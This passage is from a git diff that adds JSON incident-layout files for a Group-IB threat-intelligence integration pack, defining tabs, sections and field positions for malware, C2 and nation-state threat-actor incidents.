"dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + 
"startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 5 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 5 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-54dc56c0-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorstable", + "height": 22, + "id": "f8433370-815d-11ef-9359-c9460f2c510a", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-557a9290-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "64c66f80-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 0, + 
"sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcncurl", + "height": 22, + "id": "679a9e20-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "6a6779c0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "6d26c0d0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdateofdetection", + "height": 22, + "id": "6fa29640-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibmalwarecncdomain", + "height": 22, + "id": "722a79a0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibmalwaretable", + "height": 22, + "id": "440505b0-8620-11ef-a9b3-b3217f1b12f4", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Malware CNC Layout", + "name": "GIB Malware CNC Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_Layout.json
new file mode 100644
index 000000000000..9a15cbf0310c
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_Layout.json
@@ -0,0 +1,496 @@ +{ + "description": "Layout for GIB Malware", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, 
+ "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 7 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 11 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + 
"startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 7 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-c9beabf0-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorstable", + "height": 22, + "id": "797152b0-8163-11ef-aa60-27321c5d7423", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 0, + "y": 7 + }, + { + "displayType": "ROW", + "h": 5, + "hideName": false, + "i": "caseinfoid-ca40fb50-71aa-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "d7e2aab0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 0, + 
"sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwarename", + "height": 22, + "id": "da9c2560-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdateupdatedat", + "height": 22, + "id": "dd5d8f50-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwarealiases", + "height": 22, + "id": "e02317f0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwarecategories", + "height": 22, + "id": "e5c2e9b0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwaredescription", + "height": 44, + "id": "ea1ad220-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwareshortdescription", + "height": 44, + "id": "ecfce370-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwareregions", + "height": 22, + "id": "ef973d60-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwarelangs", + "height": 22, + "id": "f2a87500-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "f6219630-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwaresourcecountries", + "height": 22, + "id": "fc6c7500-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmalwareplatforms", + "height": 22, + "id": 
"ff4d4dd0-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 11, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibthreatlevel", + "height": 22, + "id": "01a806b0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 12, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 3, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Malware Layout", + "name": "GIB Malware Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Actor_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Actor_Layout.json new file mode 100644 index 000000000000..2b16032c379e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Actor_Layout.json 
@@ -0,0 +1,561 @@ +{ + "description": "Layout for Nation-State Cybercriminals Threat Actor", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + 
"isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 12 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 10 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + 
"sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 12 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 4, + "hideName": false, + "i": "caseinfoid-11ee7ad0-71ac-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "1b92bdd0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorcountry", + "height": 22, + "id": "25bad6d0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactordescription", + "height": 44, + "id": "2b5ddce0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 
3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorgoals", + "height": 22, + "id": "2e990ab0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibthreatactorisapt", + "height": 22, + "id": "317d17d0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorlabels", + "height": 22, + "id": "34752220-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "370d3220-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorroles", + "height": 22, + "id": "3ce1cf80-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorcve", + "height": 22, + "id": "402b2e20-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "listId": "caseinfoid-11ee7ad0-71ac-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsexpertises", + "height": 22, + "id": "4b3fca00-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsmalware", + "height": 22, + "id": "4df3ed80-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 11, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsregions", + "height": 22, + "id": "50a85f20-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 12, + "listId": "caseinfoid-11ee7ad0-71ac-11ef-8c49-f9d8b5e80cf6", + 
"sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalssectors", + "height": 22, + "id": "7ad6dd30-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 13, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "1a0970e0-8493-11ef-87c7-cfae65ac92d0", + "index": 14, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from GIB", + "static": false, + "w": 2, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-c34d05a0-7bfa-11ef-96a8-77b28953dd87", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatecreatedat", + "height": 22, + "id": "28b4dcf0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "43ca4de0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "46ea2b80-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdateupdatedat", + "height": 22, + "id": "7dba9c30-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "GIB Dates", + "static": false, + "w": 1, + "x": 0, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-b28df5e0-822a-11ef-9517-e9064fff04ea", + "items": [ + { + "endCol": 2, + "fieldId": "gibnationstatecybercriminalsthreatactorreportstable", + "height": 22, + "id": "b858cf40-822a-11ef-9517-e9064fff04ea", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor Reports", + "static": false, + 
"w": 1, + "x": 1, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Nation-State Cybercriminals Threat Actor Layout", + "name": "GIB Nation-State Cybercriminals Threat Actor Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Layout.json new file mode 100644 index 000000000000..ed49eb784046 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Layout.json 
@@ -0,0 +1,643 @@ +{ + "description": "Layout for Nation-State Cybercriminals Threat", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + 
"isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + 